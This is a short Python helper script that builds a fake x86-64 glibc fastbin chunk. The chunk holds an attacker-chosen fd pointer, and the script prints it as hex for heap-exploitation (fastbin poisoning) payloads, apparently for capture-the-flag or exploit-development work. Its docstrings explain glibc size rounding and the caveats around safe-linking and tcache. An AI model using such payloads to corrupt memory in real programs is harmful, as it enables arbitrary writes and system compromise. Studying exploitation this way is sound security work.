#!/usr/bin/python
from __future__ import print_function

import binascii
import struct
from sys import argv, stdout, stderr
# 64-bit only for now: 8-byte prev_size/size/fd fields and 16-byte chunk alignment (x86-64 glibc layout)
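def _chunk_size(request):
    """Round a malloc request size up to the chunk size glibc would use (x86-64).

    Mirrors glibc's request2size(): (req + SIZE_SZ + MALLOC_ALIGN_MASK) masked to
    the 16-byte alignment, clamped to MINSIZE. On x86-64 SIZE_SZ is 8, the
    alignment mask is 15 and MINSIZE is 32. The old inline rounding
    (size + 16 - size % 16) undercounted by one bin for requests with
    size % 16 in 9..15 (e.g. 105 -> 0x70 instead of 0x80), which would put the
    fake chunk in the wrong fastbin.

    Raises:
        ValueError: if ``request`` is negative.
    """
    if request < 0:
        raise ValueError("size must be non-negative")
    return max(32, (request + 8 + 15) & ~15)


def _build_chunk(chunkpos, size):
    """Return the raw bytes of a fake free chunk: prev_size | size | fd | filler."""
    if not isinstance(chunkpos, (bytes, bytearray)):
        # Accept a bare integer and pack it little-endian like the CLI does.
        chunkpos = struct.pack("<Q", chunkpos)
    if len(chunkpos) > 8:
        # The original silently emitted an over-long fd here; refuse instead.
        raise ValueError("chunkpos must be at most 8 bytes")
    chunk_size = _chunk_size(size)
    parts = [
        b"\x00" * 8,                                        # prev_size (unused)
        struct.pack("<Q", chunk_size | 0x1),                # size field, PREV_INUSE set
        bytes(chunkpos) + b"\x00" * (8 - len(chunkpos)),    # fd -> next "free" chunk
        b"\x41" * (chunk_size - 3 * 8),                      # 0x41 filler up to the chunk boundary
    ]
    return b"".join(parts)


def print_chunk(chunkpos, size):
    """Print (and return) the hex encoding of a fake 64-bit fastbin chunk.

    The output is laid out like an in-memory free chunk: 8-byte prev_size
    (zero), an 8-byte size field with PREV_INUSE set, an 8-byte fd holding
    ``chunkpos``, then 0x41 filler so the blob spans the whole chunk size.
    ``size`` is the *malloc request* size and is rounded to the chunk size
    the way glibc's request2size() does on x86-64.

    Packing the size field as a full little-endian qword (instead of a single
    chr() byte) also makes the function usable for chunks larger than 0xff,
    e.g. when global_max_fast has been overwritten. The hex string is printed
    with a trailing newline and returned so callers/tests can reuse it.

    NOTE(review): the fd is emitted as a raw pointer. On glibc >= 2.32
    (safe-linking) fastbin/tcache fd values are stored mangled as
    (chunk_addr >> 12) ^ ptr, and on glibc >= 2.26 these sizes are served from
    tcache first (with a different entry layout); confirm the target libc
    before relying on this layout.

    Args:
        chunkpos: value to plant in fd (the next "free" chunk) - either an int
            or up to 8 bytes already packed little-endian (as from
            ``struct.pack("<q", addr)``).
        size: requested allocation size in bytes.

    Returns:
        The lowercase hex string that was printed.

    Raises:
        ValueError: if ``chunkpos`` is packed and longer than 8 bytes, or
            ``size`` is negative.
    """
    data = _build_chunk(chunkpos, size)
    hexstr = binascii.hexlify(data).decode("ascii")
    print(hexstr)
    return hexstr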
if __name__ == '__main__':
    # CLI: <victim->fd address, always hex> <request size, decimal or 0x-prefixed hex>
    if len(argv) <= 2:
        print("Usage: %s 0x630142 112 [or 0x70]" % argv[0], file=stderr)
    else:
        target, raw_size = argv[1], argv[2]
        print(("[+] Next free is going to be: victim->fd = %s " % target), file=stderr)
        next_free = struct.pack("<q", int(target, 16))
        base = 16 if "0x" in raw_size else 10
        print_chunk(next_free, int(raw_size, base))